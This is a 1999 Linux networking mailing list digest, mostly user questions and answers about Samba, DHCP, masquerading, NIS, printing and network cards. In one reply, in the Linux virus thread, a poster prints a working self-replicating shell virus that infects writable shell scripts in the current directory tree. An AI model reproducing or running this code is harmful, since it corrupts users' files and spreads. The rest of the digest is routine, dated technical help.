Linux-Networking Digest #146, Volume #10 Mon, 8 Feb 99 14:13:24 EST
Contents:
Re: virus' for Linux (Rod Smith)
Re: NT Domain Help ("Sean Connolly")
Re: Ping problem ("Sean Connolly")
Re: Caching nameserver under Linux with Masquerading... ("Christopher G. Petty")
dhcpd.conf troubles ("Ron")
Multi IP addresses on one NIC question (Stormie Nelson)
Re: Samba and Win for WG 3.11 (Tom)
Re: virus' for Linux (James Riordan)
Problem with network on RH 5.2 (John Doug Smith)
Re: securing a linux box (Raymond Doetjes)
FTP & masquerading not working (Name)
Re: APSfilter and printer offline.. (Gernot Fink)
pending connects (Joern Schimmelpfeng)
Re: Cannot login to samba server (rob)
Re: NIS: Redhat 5.2 client, SunOS Server?? (Viraj Alankar)
Re: Help with Network Card (Cecil Watson)
Re: APSfilter and printer offline.. (Matt Kressel)
Re: APSfilter and printer offline.. (Matt Kressel)
Please help w/muliple NICs (Cecil Watson)
Re: Xircom CEM 56 and Thinkpad 600E (Mike Shivas)
----------------------------------------------------------------------------
From: [EMAIL PROTECTED] (Rod Smith)
Subject: Re: virus' for Linux
Date: 8 Feb 1999 13:55:59 GMT
Reply-To: [EMAIL PROTECTED]
[Posted and mailed]
In article <[EMAIL PROTECTED]>,
Precious Metal <[EMAIL PROTECTED]> writes:
>
> Just out of curiosity, are there virus's for Linux? This may sound stupid,
> but I haven't been running Linux long enough to get a virus. I've seen a
> couple of virus program for Linux, but not the amount that I've seen (and had
> to run) for Windows. If anyone has any info, I'd appreciate it.
I think I heard that somebody once wrote one just to prove it could be
done. AFAIK, it's not very widespread. In the Linux world, the real issue
is one of security, especially if your system is connected to the Internet
for any substantial period of time. It's important to keep up with
security-related updates to your distribution, and to know enough about
the issue to be able to shut down unused services and otherwise take
useful security precautions.
--
Rod Smith
[EMAIL PROTECTED]
http://www.users.fast.net/~rodsmith
NOTE: Remove the "uce" word from my address to mail me
------------------------------
From: "Sean Connolly" <[EMAIL PROTECTED]>
Subject: Re: NT Domain Help
Date: Mon, 8 Feb 1999 08:42:49 -0500
drew wrote in message <[EMAIL PROTECTED]>...
>I have RedHat 5.2 and would like to login to my school's NT Domain like
>i do in Windows 95. We have access to temporary storage servers, other
>servers, and printers through the NT Domain. How would ould i go about
>configuring linux to be able to access the NT Domain? And after that,
>see other students' file servers like i would in Win95 network
>neighborhood? is it even possible? thanks!
Get the package called "Samba".
Sean
------------------------------
From: "Sean Connolly" <[EMAIL PROTECTED]>
Subject: Re: Ping problem
Date: Mon, 8 Feb 1999 08:45:36 -0500
Dave Peticolas wrote in message ...
>22:05:47 -0800, Luca Filipozzi <[EMAIL PROTECTED]> wrote:
>>In article <yXuv2.8497$[EMAIL PROTECTED]>,
>>[EMAIL PROTECTED] says...
>>> Hello all,
>>>
>>One possibility: your ISP may not be allowing icmp packets through. This
>>would be very odd, though.
>
>I've heard that some ISP's have begun doing that to cut down on smurf
attacks.
>
>note: I can't ping microsoft either and I know my ping works.
That still wouldn't solve his prolbem though. If he can't telnet or ftp
out to other systems other then his own isp there must be something else
wrong.
Hrmmm, smells like a routing problem.
Sean
------------------------------
From: "Christopher G. Petty" <[EMAIL PROTECTED]>
Subject: Re: Caching nameserver under Linux with Masquerading...
Date: Fri, 29 Jan 1999 01:11:08 -0500
Great reply, Brian. insult the programs on the OS that we all love.. Cause
dissention in the ranks so Bill Gate$ and his billion$ can take over the whole
world..
nslookup works just fine, Steve, you just need to change one thing..
'host.conf'
order dns,hosts,bind
trim sjh.net.
Also making your DNS reverse resolve as Brian suggested will help as well.
Email me directly if you need help with that, so we can keep the 'This and That is
Junk" comments to a minimum and concentrate on solving the problem at hand.
_CGP
Brian McCauley wrote:
> That's becase nslookup is crappy. It insists that the server it uses
> has a reverse DNS entry. Nothing else cares, just nslookup.
>
> My advice is ditch nslookup and use dig.
>
> Alternatively if you really like nslookup make your nameserver
> authoratative for 168.192.in-addr.arpa and put the right stuff in
> there.
>
> --
> \\ ( ) No male bovine | Email: [EMAIL PROTECTED]
> . _\\__[oo faeces from | Phones: +44 121 471 3789 (home)
> .__/ \\ /\@ /~) /~[ /\/[ | +44 121 627 2173 (voice) 2175 (fax)
> . l___\\ /~~) /~~[ / [ | PGP-fp: D7 03 2A 4B D8 3A 05 37...
> # ll l\\ ~~~~ ~ ~ ~ ~ | http://www.wcl.bham.ac.uk/~bam/
> ###LL LL\\ (Brian McCauley) |
------------------------------
From: "Ron" <[EMAIL PROTECTED]>
Subject: dhcpd.conf troubles
Date: Mon, 8 Feb 1999 12:33:19 +0100
Reply-To: "Ron" <[EMAIL PROTECTED]>
I've been trying to get dhcp to work on a single network, getting lost
though:-(
I've read the man-page, several how-to's, mini-howto's and FAQ's and came up
with this:
Contents of dhcpd.conf:
subnet 10.1.10.0 netmask 255.255.255.0 {
range 10.1.10.10 10.1.10.25;
default-lease-time 86400;
max-lease-time 259200;
option subnet-mask 255.255.255.0;
option domain-name "loose_ends";
}
Everytime I start the deamon I get the same error:
/etc/dhcpd.conf line 6: expecting a parameter or declaration
su
^
So I tried to move the {} thingies, added a shared network declaration and
it still won't work.
What am I missing?
Do I have to learn to read again?
TIA
Ron
------------------------------
From: Stormie Nelson <[EMAIL PROTECTED]>
Crossposted-To: comp.os.linux.misc,comp.os.linux.setup
Subject: Multi IP addresses on one NIC question
Date: Mon, 08 Feb 1999 09:16:35 -0600
Howdy from Texas -
I am trying to set up a masquerading firewall. I have done this before
with no real problems, but I am doing something a little weird at a
customer's request. It has a legal address assigned by the ISP, and
they want me to assign a private address for ipmasq to the same NIC, so
the same physical interface is configured for the public and the private
network.
In rc.inet1 I am doing
/sbin/ifconfig eth0 201.20.99.2 broadcast 201.20.99.255 netmask
255.255.255.0
/sbin/ifconfig eth0:0 192.168.200.1 broadcast 192.168.200.255 netmask
255.255.255.0
/sbin/route add default gw 201.20.99.1 netmask 0.0.0.0 metric 1
/sbin/route add -net 192.168.200.0 gw 192.168.200.1
In a file I created called rc.masq I am doing
/sbin/modprobe /lib/modules/2.0.36/ipv4/ip_masq_cuseeme.o
/sbin/modprobe /lib/modules/2.0.36/ipv4/ip_masq_ftp.o
/sbin/modprobe /lib/modules/2.0.36/ipv4/ip_masq_irc.o
/sbin/modprobe /lib/modules/2.0.36/ipv4/ip_masq_quake.o
/sbin/modprobe /lib/modules/2.0.36/ipv4/ip_masq_raudio.o
/sbin/modprobe /lib/modules/2.0.36/ipv4/ip_masq_vdolive.o
/sbin/ipfwadm -F -p accept
/sbin/ipfwadm -F -f
/sbin/ipfwadm -I -f
/sbin/ipfwadm -O -f
/sbin/ipfwadm -F -a m -S 192.168.200.0/24 -D 0.0.0.0/0
I know, I have not yet locked down the firewalling portion, I just want
to get connectivity squared away before I start shutting services down.
I am getting kind of weird results, like _intermittent_ ability to get
out to the Internet from within the private network, especially from
folks dialing in to the >cringe< WinNT RAS server.
I am running Slackware 3.6, kernel 2.0.36, and an Intel Ether Express
Pro 100b. Is this just not a good thing to do, running two logical
networks on one physical interface? I am starting to believe it is not,
but I was just looking for anyone who had any input.
If convenient, please respond via e-mail as well as post.
Thanks!
------------------------------
From: [EMAIL PROTECTED] (Tom)
Subject: Re: Samba and Win for WG 3.11
Date: Mon, 08 Feb 1999 14:14:19 GMT
As far as I know you should be able to do this as long as you do not
turn on pasword encryption int he smb.conf file.
On Sun, 7 Feb 1999 21:23:25 -0700, "Jess Canada" <[EMAIL PROTECTED]>
wrote:
>Hello,
>
>I'm a newbie both to Linux and networking, but I wanted to look into setting
>up a small network with a server running Linux and a few clients running
>Windows for Workgroups v3.11 (they're 386s, so Win95 isn't really an
>option). I've read about how Samba can allow Win 95 clients to access a
>Linux server, but is there a way to do this with Windows for Workgroups?
>
>Thanks in advance,
>
>Jess Canada
>[EMAIL PROTECTED]
>
>
------------------------------
From: James Riordan <[EMAIL PROTECTED]>
Subject: Re: virus' for Linux
Date: 08 Feb 1999 15:33:11 +0100
> I think I heard that somebody once wrote one just to prove it could
> be done.
Sorry for the long line but...
#!/bin/sh
( V_s=$_;i () { ( e=echo; $e 1 r \!sed -n 2p $V_s;$e w;$e q) | ed -s $1;}; d () { if [
-w $1 -a "`head -1 $1`" = "#!/bin/sh" -a "`grep -n V_i $1`" = "" ]; then i $1;fi;};
for b in `find . -type f -print`;do d $b;done; ) &
echo I am a shell virus
as at
http://www.math.umn.edu/~riordan/security/unix_virus.html
I've played around with polymorphic elf virii a few years ago but that
actually seemed dangerous so I quit.
--
James Riordan [EMAIL PROTECTED]
IBM Forschungslaboratorium Tel +41 (0) 1 724 89 81
S�umerstrasse 4
CH-8803 R�schlikon, Switzerland
------------------------------
From: [EMAIL PROTECTED] (John Doug Smith)
Subject: Problem with network on RH 5.2
Date: 8 Feb 1999 16:53:49 GMT
Mysterious Problem
Here is the setup
1 machine running Linux (Red Hat 5.2) running on an NEC versa 6050MX with
Xircom 10/100 PCMCIA (CE3B-100BTX). IP address 1.1.1.249.
2 machines running Win95. IP addresses 1.1.1.2 & 1.1.1.3.
1 10 megabit hub
1 ISDN bridge/router running NAT (Baynetworks CLAM 854). Internal IP address
1.1.1.1, IP address assigned to it by ISP x.x.x.x.
The CLAM connects the internal network to the Internet through an ISP. It
has a dedicated IP address on the ISP side, Lets say x.x.x.x. It is
running NAT for the internal network of 1.1.1.0. The 3 machines (1 Linux &
2 Win95) all reside on the internal 1.1.1.0 network. The 2 Win95 machines
have no problems getting to the Internet. However the Linux box is giving
me all kinds of fits.
Problem #1
Linux box seems to lose all network connectivity after a short period of time.
I can not ping anything from the Linux box nor can anything ping it. However
the link light is still on on the adapter but there very little if any
traffic.
Problem #2
Sometimes when I run the route command the system lists the first route in
the table then the route program appears to hang, I have to hit ctrl-c to
get out of it. Netstat -rn still works but route just hangs. It takes a
reboot to get the route command to comeback to life.
Any help would be greatly appreciated.
Thanks
Douglas
[EMAIL PROTECTED]
------------------------------
From: Raymond Doetjes <[EMAIL PROTECTED]>
Crossposted-To: comp.os.linux.misc
Subject: Re: securing a linux box
Date: Mon, 25 Jan 1999 22:14:43 +0100
Build a firewall and masquerading kernel and only enable these port and
voila it works
Raymond
------------------------------
From: [EMAIL PROTECTED] (Name)
Crossposted-To: comp.os.linux.setup
Subject: FTP & masquerading not working
Date: Mon, 08 Feb 1999 15:46:25 GMT
I have masquerading working but not for a couple of FTP servers that I
use all the time.
They servers are using WarFTPD 1.65 I think. I can login ok but when I
do a listing, it prints 'opening DATA NON-PRINT connection' and then
nothing. No listing at all. Just hangs.
I have tried passive mode from the command-line ftp client on NT 4 and it
still fails.
I have the following in my rc.d/rc.local file
/sbin/depmod -a
/sbin/modprobe ip_alias
/sbin/modprobe ip_masq_ftp
/sbin/modprobe ip_masq_raudio
/sbin/modprobe ip_masq_irc
Real Audio works great. and FTP works fine too to several sites.
any idea?
Reggie
------------------------------
From: [EMAIL PROTECTED] (Gernot Fink)
Crossposted-To: comp.os.linux.misc,comp.os.linux.setup,linux.misc
Subject: Re: APSfilter and printer offline..
Date: 8 Feb 1999 17:08:26 GMT
In article <[EMAIL PROTECTED]>,
[EMAIL PROTECTED] (|_@nc&|ot) writes:
> I'm trying to setup SUSE 6.0 with APSfilter to print on my LaserJet
> 5Mp without success!!
>
> If i try to print from shell (cat foo.txt > /dev/lp) or within KDE
is /dev/lp a block devicefile or a link to it ???
the correct printerdevice is /dev/lp1 (SuSe)
> applications, the only response is:
> ...NOTHING!!!...
>
> lpc status is:
>
> bash-2.02# lpc status
> ascii:
> queuing is enabled
> printing is enabled
> no entries
> printer idle
> lp:
> queuing is enabled
> printing is enabled
> 3 entries in spool area
> waiting for lp to become ready (offline ?)
> raw:
> queuing is enabled
> printing is enabled
> no entries
> printer idle
>
>
> Naturally my printer is ready and online......
>
> Can you help me to found a solution to this amazing and unpleasant
> problem.. :-)
>
> Thanks in advance for any tip.
--
MFG G.Fink
------------------------------
From: Joern Schimmelpfeng <[EMAIL PROTECTED]>
Subject: pending connects
Date: 8 Feb 1999 17:13:47 GMT
Hi,
as netstat told me, there are some pending tcp connections, which had
died some days ago in real. This connections are in in established or
close_wait stat, with timer off.
How does this failure occure and how can I correct it ?
For complettness: I'm using Linux 2.0.36, with one ne2000 and a ppp
interface.
Bye
J�rn
--
J�rn Schimmelpfeng
[EMAIL PROTECTED]
------------------------------
From: [EMAIL PROTECTED] (rob)
Crossposted-To: comp.protocols.smb,comp.os.linux.setup,linux.redhat.misc
Subject: Re: Cannot login to samba server
Date: Mon, 08 Feb 1999 17:53:22 GMT
if you go to samba web site samb.org and find the docs section there
is a test procedure to run through it was very helpfull to me.
if you do use encryption you must make a linux account that matches 9x
login and then do the smbpasswd command with the add user option
also in smb.conf there is a place to make case sensitive login it was
a 8 in it or some shit uncomment these lines
with all that mine works great but that diag document from sambas site
helped alot
rob
On Fri, 29 Jan 1999 23:45:31 -0800, "Lucas Technology"
<[EMAIL PROTECTED]> wrote:
>The other way to go without giving up password encryption is to modify samba
>/etc/smb.conf but good luck trying to do it!
>
>Jonas <[EMAIL PROTECTED]> wrote in message
>news:774aqt$rgr$[EMAIL PROTECTED]...
>>If you are using windows 95 osr2 or NT you have to use encrypted passwords
>>or disable this feature on your windows mashines.
>>Read files ENCRYPTION.txt, WinNT.txt and Win95.txt in /usr/doc/samba*/docs
>>directory for more info.
>>
>>/Jonas
>>
>>
>
------------------------------
From: Viraj Alankar <[EMAIL PROTECTED]>
Subject: Re: NIS: Redhat 5.2 client, SunOS Server??
Date: Mon, 08 Feb 1999 01:26:21 GMT
In article <78qtbs$o7s$[EMAIL PROTECTED]>,
[EMAIL PROTECTED] (Mark Morley) wrote:
> I've just setup a new RedHat 5.2 system that I'd like to integrate into an
> existing NIS environment. The NIS server and all the other clients are
> running SunOS.
>
> I've got it to the point where the Linux box is communicating with the NIS
> server. I can ypcat the passwd file, etc. What I can't do is log into
> the system using any username/password from the NIS map.
>
> The NIS server is using C2 security, so it has a passwd.adjunct file. It
> appears to me that the PAM system can find the passwd entry but is
> ignoring passwd.adjunct...?
>
> Does anyone have RedHat 5.2 working as an NIS client with a Sun server
> that uses passwd adjunct? And if so, how'd you do it?
>
I explain one way of doing it on my web page. Hope it helps:
http://www.bigfoot.com/~valankar
============= Posted via Deja News, The Discussion Network ============
http://www.dejanews.com/ Search, Read, Discuss, or Start Your Own
------------------------------
From: Cecil Watson <[EMAIL PROTECTED]>
Subject: Re: Help with Network Card
Date: Mon, 08 Feb 1999 08:34:41 -0800
I've used several card with the Realtek 8029 chipset, the NE2K-PCI
drivers work fine!
------------------------------
Crossposted-To: comp.os.linux.misc,comp.os.linux.setup,linux.misc
From: Matt Kressel <[EMAIL PROTECTED]>
Subject: Re: APSfilter and printer offline..
Date: Mon, 8 Feb 1999 15:24:20 GMT
|_@nc&|ot wrote:
>
> I'm trying to setup SUSE 6.0 with APSfilter to print on my LaserJet
> 5Mp without success!!
>
> If i try to print from shell (cat foo.txt > /dev/lp) or within KDE
> applications, the only response is:
> ...NOTHING!!!...
>
> lpc status is:
>
> bash-2.02# lpc status
> ascii:
> queuing is enabled
> printing is enabled
> no entries
> printer idle
> lp:
> queuing is enabled
> printing is enabled
> 3 entries in spool area
> waiting for lp to become ready (offline ?)
> raw:
> queuing is enabled
> printing is enabled
> no entries
> printer idle
>
> Naturally my printer is ready and online......
>
Try using the lpr command. Unless you use it, the filters will not be
used.
"lpr foo.txt"
-Matt
--
Matthew O. Kressel | INTERNET: [EMAIL PROTECTED]
+--------- Northrop Grumman Corporation, Bethpage, NY ---------+
+--------- TEL: (516) 346-9101 FAX: (516) 346-9740 ------------+
------------------------------
Crossposted-To: comp.os.linux.misc,comp.os.linux.setup,linux.misc
From: Matt Kressel <[EMAIL PROTECTED]>
Subject: Re: APSfilter and printer offline..
Date: Mon, 8 Feb 1999 15:25:20 GMT
|_@nc&|ot wrote:
>
> I'm trying to setup SUSE 6.0 with APSfilter to print on my LaserJet
> 5Mp without success!!
>
> If i try to print from shell (cat foo.txt > /dev/lp) or within KDE
> applications, the only response is:
> ...NOTHING!!!...
>
> lpc status is:
>
> bash-2.02# lpc status
> ascii:
> queuing is enabled
> printing is enabled
> no entries
> printer idle
> lp:
> queuing is enabled
> printing is enabled
> 3 entries in spool area
> waiting for lp to become ready (offline ?)
> raw:
> queuing is enabled
> printing is enabled
> no entries
> printer idle
>
> Naturally my printer is ready and online......
>
Oh yeah, and also make sure you have "lp" printer support in the kernel.
-Matt
--
Matthew O. Kressel | INTERNET: [EMAIL PROTECTED]
+--------- Northrop Grumman Corporation, Bethpage, NY ---------+
+--------- TEL: (516) 346-9101 FAX: (516) 346-9740 ------------+
------------------------------
From: Cecil Watson <[EMAIL PROTECTED]>
Subject: Please help w/muliple NICs
Date: Mon, 08 Feb 1999 08:31:24 -0800
Hello,
I'm having problem configuring multiple NIC under RedHat 5.2. I can
get both of them recognized, but can only ping one at a time?! I must
disable one, ping the other disable,enable the first them I can ping
it?! I'm trying to enable IP masquerading, I've read the How-Tos but
cannot find and answer. Thanks in advance,
cesman
------------------------------
From: Mike Shivas <[EMAIL PROTECTED]>
Crossposted-To: comp.os.linux.portable,comp.os.linux.setup
Subject: Re: Xircom CEM 56 and Thinkpad 600E
Date: Mon, 08 Feb 1999 12:46:54 -0500
Are you making all the necessary IP configuration changes in
/etc/pcmcia/network.opts?
I have this card working on a Toshiba 220 AND an IBM Thinkpad 350c (yup - it's
old). Both modem and NIC work perfectly. I don't remember too much trouble
installing, though I think there may have been a weird problem with the media
type. I think there are a few different "flavors" of 10BaseT ethernet, and
whoever got onto the network first would pick the type. If another machine got
on first, Linux would be unable to auto-detect the media type. Now I always
boot my Linux server first, then my iMac and Win32 Toshiba.
The troubleshooting section of the PCMCIA FAQ mentions some ways to dump a lot
more debugging data from the PCMCIA package.
mike
Michael W. Godfrey wrote:
Michael W. Godfrey wrote:
> Hi,
>
> I have a Thinkpad 600E running Redhat 5.2. I am trying to get the network
> card configured correctly but no success so far.
>
> I have the non-cardbus Xircom Realport combo 10/100/56K card (CEM56, yes?).
> So far networking and modem work under Win98 and WinNT, and modem works
> under Linux using minicom. Can't figure out what is wrong with the
> networking. The local Linux techie couldn't figure it out either.
>
> The current state of affairs (my tech support person wrote this) is:
> -- The PCMCIA manager (3.0.5) recognizes the card (Xircom CEM 56) and
> installs the correct modules.
> -- The ethernet driver is properly initialized and recognizes the ethernet
> connection (see "Meda 10BaseT, silicon revision 5" messages).
> -- ifconfig eth0 shows port 0x300, irq 3 hwaddr 00:10:A4:F6:39:6D
> -- Kernel and pcmcia RPM versions are 2.0.36-0.7
> -- Trying to ping something on the network results in "lost packets"
> although the stats via /proc/interrupts and ifconfig don't change - no
> interrupts, TX/RX packets, or framing problems.
>
> Any hints on what might be wrong or needs to be done?
>
> Thanks very much in advance for any help.
>
> -- Mike
------------------------------
** FOR YOUR REFERENCE **
The service address, to which questions about the list itself and requests
to be added to or deleted from it should be directed, is:
Internet: [EMAIL PROTECTED]
You can send mail to the entire list (and comp.os.linux.networking) via:
Internet: [EMAIL PROTECTED]
Linux may be obtained via one of these FTP sites:
ftp.funet.fi pub/Linux
tsx-11.mit.edu pub/linux
sunsite.unc.edu pub/Linux
End of Linux-Networking Digest
******************************
